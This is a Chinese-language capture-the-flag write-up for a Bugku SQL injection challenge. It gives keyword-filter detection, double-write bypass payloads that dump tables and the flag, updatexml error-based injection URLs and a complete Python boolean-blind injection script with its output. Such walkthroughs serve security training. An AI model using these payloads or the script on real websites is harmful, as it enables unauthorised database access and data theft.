多次
原题链接
http://120.24.86.145:9004
分析
- 单引号出错
- 加上%23,发现不出错了
- 加上
' and 1=1%23
又出错了,应该是过滤了
这里学习到一个新知识,如何判断过滤了哪些字符?
采用异或注入。
在id=1后面输入 '(0)'
发现不出错,那就将0换成1=1
如果出错,那就是成功了
如果括号里面的判断是假的,那么页面就会显示正确
那么同理,
如果我修改里面的内容为length(‘union’)!=0
如果页面显示正确,那就证明length(‘union’)==0的,也就是union被过滤了
同样道理,测试出过滤字符 select,union,and,or
可以采用双写绕过。测试payload:
http://120.24.86.145:9004/1ndex.php?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,2%23
页面结果
2
database:
?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,database()%23
web1002-1
tables:
注意information里面有or,要双写过滤
?id=-1' ununionion seselectlect 1, group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() #
页面结果
flag1,hint
columns:
?id=-1' ununionion seselectlect 1, group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='flag1' %23
页面结果
flag1,address
dump:
?id=-1' ununionion seselectlect 1, group_concat(flag1) from flag1 %23
页面结果
usOwycTju+FTUUzXosjr
?id=-1' ununionion seselectlect 1, group_concat(address) from flag1 %23
页面结果
./Once_More.php
下一关地址
进入链接
测试?id=1'
报错
My Id =1'
Nobody!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
我还是一样的办法测试过滤
union substr sleep
双写无法绕过,大小写无法绕过,/*!*/无法绕过。
更换函数,利用updatexml报错。
payload
# 查表
http://120.24.86.145:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~class,flag2~'
# 查字段
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~flag2,address~'
# 查数据
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'
本题也可以用布尔盲注来做,毕竟有回显和明显的TF标志,因为碰巧也在学习盲注,做了一下,这里附上脚本:
import requests
def length_schema():
for x in range(1,20):
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20length(database())='+str(x)+'%23'
s = requests.get(url)
if "Hello" in s.text:
print 'schema_length is :' + str(x)
global a
a = int(x)
break
def schema_name():
x = 0
name = ''
while x < a:
x = x + 1
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
for i in temp:
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20mid(database(),'+ str(x) +',1)=%27'+str(i)+'%27%23'
s = requests.get(url)
if "Hello" in s.text:
name = name + str(i)
print 'sechma_name is :' + name
global schema_name
schema_name = name
def all():
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for x in xrange(0,20):
table_name = ''
for y in xrange(1,20):
key = 0
for i in temp:
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27'+schema_name+'%27%20limit%20'+str(x)+',1),'+str(y)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url)
if "Hello" in s.text:
key = 1
table_name = table_name + str(i)
if key == 0:
break
if table_name == '':
break
print 'one of tables is:' + table_name
for p in xrange(0,20):
column_name = ''
for q in xrange(1,20):
key = 0
for i in temp:
url_columns = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27'+schema_name+'%27%20and%20table_name=%27'+table_name+'%27limit%20'+str(p)+',1),'+str(q)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url_columns)
if "Hello" in s.text:
key = 1
column_name = column_name + str(i)
if key ==0:
break
if column_name == '':
break
print 'a column name of '+table_name+' is '+column_name
for y in xrange(0,10):
data = ''
for z in xrange(1,20):
key = 0
for i in temp_data:
url_data = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20'+column_name+'%20from%20`'+schema_name+'`.'+table_name+'%20limit%20'+str(y)+',1),'+str(z)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url_data)
if "Hello" in s.text:
data = data + str(i)
key = 1
if key == 0:
break
if data == '':
break
print 'one data of '+schema_name+'.'+table_name+'\'s '+column_name+' is '+data
def main():
length_schema()
schema_name()
all()
if __name__ == '__main__':
main()
结果
schema_length is :9
sechma_name is :web1002-2
one of tables is:class
a column name of class is id
one data of web1002-2.class's id is 1
one data of web1002-2.class's id is 2
one data of web1002-2.class's id is 3
one data of web1002-2.class's id is 4
one data of web1002-2.class's id is 5
one data of web1002-2.class's id is 6
one data of web1002-2.class's id is 7
a column name of class is name
one data of web1002-2.class's name is TOM
one data of web1002-2.class's name is Jack
one data of web1002-2.class's name is Mack
one data of web1002-2.class's name is Jones
one data of web1002-2.class's name is James
one data of web1002-2.class's name is Fox
one data of web1002-2.class's name is Henry
one of tables is:flag2
a column name of flag2 is flag2
one data of web1002-2.flag2's flag2 is flag{Bugku-sql_6s-2
a column name of flag2 is address
one data of web1002-2.flag2's address is .
[Finished in 1620.8s]
flag
flag{bugku-sql_6s-2i-4t-bug}
知识点
报错注入,基本的过滤和绕过,布尔盲注